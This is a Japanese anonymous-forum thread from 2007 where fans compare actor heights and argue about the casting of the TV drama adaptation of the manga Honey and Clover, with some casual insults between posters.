森田 忍 … 成宮寛貴・172cm
勅使河原美和子 … 滝沢沙織・172cm
山田あゆみ … 原田夏希・168cm
花本はぐみ … 成海璃子・163cm
原田理花 … 瀬戸朝香・163cm

…森田って原作じゃ結構デカくなかったっけ?

147 :花と名無しさん:2007/11/29(木) 16:25:48 ID:???0
>>146
竹本より低い森田って・・・

148 :花と名無しさん:2007/11/29(木) 16:58:10 ID:???O
予想
竹本…165
はぐ…145
山田…170
真山…183
森田…180
花本…175
野宮…180
リカ…159

だったorz
キャストありえね

149 :花と名無しさん:2007/11/29(木) 17:26:37 ID:???0
ちなみに映画版、身長差(高い順)

森田 忍 … 伊勢谷 友介・180cm
真山 巧 … 加瀬 亮・174cm
花本修司 … 堺 雅人・172cm
竹本祐太 … 櫻井 翔・171cm
山田あゆみ … 関 めぐみ・169cm
原田理花 … 西田 尚美・163cm
花本はぐみ … 蒼井 優・160cm



150 :花と名無しさん:2007/11/29(木) 17:43:06 ID:???0
まあ、テレビのスタッフは身長とか
そういった見た目に関するイメージや雰囲気は
別にどうでもいいんだろうなあ。

151 :花と名無しさん:2007/11/29(木) 18:43:59 ID:???0
映画のキャストが輝いて見えるwww

152 :花と名無しさん:2007/11/29(木) 18:48:59 ID:???0
はぐが163aとか( ゚д゚)

153 :花と名無しさん:2007/11/29(木) 20:26:45 ID:???O
瀬戸朝香の理花…
健康そうな気の荒い理花になりそう。

154 :花と名無しさん:2007/11/29(木) 21:02:02 ID:???0
瀬戸って気の強い自立した女の役でイメージが定着しつつあるから
違うタイプの役をやりたいみたいだね。
そういう意味でリカを引き受けたのなら、役作り頑張ってくれるのかも。

体重47〜8kgあるみたいだから、身長163cmなら
もう5kgくらい落としてくれないとリカっぽくはないけどな。

155 :花と名無しさん:2007/11/29(木) 22:15:58 ID:???O
瀬戸は痩せないだろ。
痩せにくそう。骨からしてゴツそうだし。
それに今幸せいっぱいだしな。

156 :花と名無しさん:2007/11/30(金) 09:14:42 ID:???0
だって理花って、ご飯ほとんど食べてないって表現なかった?
すごく痩せてるってキャラで描かれてると思うんだけど
そんな健康的な人がやって
「自分のせいで旦那を死なせて自分を責め続けてる」って
繊細な役がこなせるものなのか?
瀬戸朝香は好きだけど理花には激しく合わない役だと思う…。

157 :花と名無しさん:2007/11/30(金) 13:41:57 ID:???0
成海も最近の写真みたらがっちりごっつい感じだった。
背も163以上ありそうだったし。

158 :花と名無しさん:2007/11/30(金) 14:38:36 ID:???0
ドラマ板に写真出てたよ。
思ったより良かった。リカはいないけど。
ttp://hey.chu.jp/up/source3/No_10260.jpg

159 :花と名無しさん:2007/11/30(金) 15:31:47 ID:???0
おお、可愛いな。
森田がちょっと微妙かな?

160 :花と名無しさん:2007/11/30(金) 19:01:30 ID:???0
ドラマは失敗だろ
キャスティングからして

161 :花と名無しさん:2007/11/30(金) 19:32:00 ID:???0
竹本と森田が微妙すぎ

162 :花と名無しさん:2007/11/30(金) 19:35:05 ID:???0
はぐは、年齢不相応だとしても子役を使って欲しかったな。

163 :花と名無しさん:2007/11/30(金) 19:39:08 ID:???0
それはw
成海でも竹本森田はやりにくいだろうにw


164 :花と名無しさん:2007/11/30(金) 21:11:28 ID:???0
成海は15だからどっちかいうと子役に近いのに
でかいし、大人びた顔してるからねー

165 :花と名無しさん:2007/12/01(土) 23:12:56 ID:???0
璃子たんは神童って映画見たら
えらいなんか白くてはぐにもなんとなく合うかもとオモタ
メイクとか次第じゃないかな?

166 :花と名無しさん:2007/12/01(土) 23:15:59 ID:???0
ちなみに参考に特報
ttp://youtube.com/watch?v=UiALzQjp1XY

167 :花と名無しさん:2007/12/02(日) 03:45:59 ID:???0
問題は制作費ではないか
花君は男子を大勢集めて毎回イベントを行った
毎回異なるセットを組んでのイベントだった

有閑は6人で話してるだけのシーンが多い
これでは盛り上がりに欠けて当然だ

168 :花と名無しさん:2007/12/02(日) 15:29:00 ID:???0
もう成海の時点で失敗
役者には領分ってものがあるんだよ


169 :花と名無しさん:2007/12/02(日) 19:10:46 ID:???0
ほんと全然だめだねぇキャスティング
村上淳ってのもイメージと違うし

170 :花と名無しさん:2007/12/02(日) 19:39:06 ID:W0Zl6pe80
その成海さんの立場から見ても、何とも冴えない共演者陣だ
頼れるのは生田だけ

成海さんの為に頑張るのは生田一人という寂しい状況だ

171 :花と名無しさん:2007/12/02(日) 19:39:57 ID:???0
生田も全然合ってない
合ってるのは向井だけ

172 :花と名無しさん:2007/12/02(日) 20:54:30 ID:???0
向井は大根だよ?
生田人気に頼ってるのは明らか

173 :花と名無しさん:2007/12/02(日) 21:02:52 ID:???0
生田ヲタきもいー
生田が竹本って個人的に最悪なんですけど

174 :花と名無しさん:2007/12/02(日) 21:05:42 ID:???0
役者というのは馬鹿になってナンボだと思うけど
その気概が向井さんには無いようだ
役者としてやっていける手ごたえがまだ無いからだろう

175 :花と名無しさん:2007/12/02(日) 21:09:46 ID:???0
生田の演技のセンスは面白そうだなと思うけどヲタではない。
ヲタ決めする奴うざいよ?話にならなくなる。

176 :花と名無しさん:2007/12/02(日) 21:12:39 ID:???0
>>175
生田ヲタ丸出しwww

177 :花と名無しさん:2007/12/02(日) 21:34:28 ID:???0
花君見てないから他にどんなドラマに出てたか知らないし
テレビでもあまり見たことないから、人気って言われてもピンと来ない・・・

178 :花と名無しさん:2007/12/02(日) 21:40:26 ID:???0
俺のクラスの女子は小栗派か生田派かバンド系


179 :花と名無しさん:2007/12/02(日) 21:43:58 ID:???0
ちなみに生田ハチクロは話題にはなってる。
俺がハチクロ読んだのはクラスの女友から借りたのが
きっかけだったからハチクロは人気ある。

180 :花と名無しさん:2007/12/02(日) 21:50:45 ID:???0
生田ヲタの俺使い腐女子死なないかなぁあ

181 :花と名無しさん:2007/12/03(月) 02:12:29 ID:???0
話題ったって、演技のいろはもわからん奴らが騒いでるだけのことだろ
色々忙しいんだろうけど、蒼井優でいってほしかった

182 :花と名無しさん:2007/12/03(月) 06:47:43 ID:VEWWILrb0
蒼井優はギャンブルの広告塔ですよ

183 :花と名無しさん:2007/12/03(月) 06:53:56 ID:???0
蒼井は映画だけ出てればいい。
ドラマは合わない。

184 :花と名無しさん:2007/12/03(月) 16:24:10 ID:???O
瀬戸はリカよりも美和子さんだろ…

185 :花と名無しさん:2007/12/03(月) 21:47:21 ID:???0
まぁどうせ一応と思って、1話だけ見るだけだけどな

39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)